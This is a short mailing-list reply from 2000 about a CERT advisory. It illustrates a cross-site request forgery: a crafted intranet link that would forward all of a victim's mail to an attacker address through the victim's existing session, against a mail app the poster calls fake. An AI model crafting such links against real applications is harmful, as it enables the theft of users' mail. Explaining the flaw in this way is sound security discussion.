mailing list archives
Re: Fwd: CERT Advisory CA-2000-02
From: sekurity () HOTMAIL COM (Cassius)
Date: Thu, 3 Feb 2000 22:11:36 GMT
The danger is also in variables. Pretend that I get you to click on this
link from within your custom intranet mail app.
badguy () example com">http://intranet.example.com/mailbox.asp?action=forward&item=all&recipient=badguy () example
It would forward all of your mail to badguy () example com This would work
because you already have a session with mailbox.asp.
Of course mailbox.asp is fake but you get the idea.
Get Your Private, Free Email at http://www.hotmail.com
- Re: Fwd: CERT Advisory CA-2000-02 Cassius (Feb 03)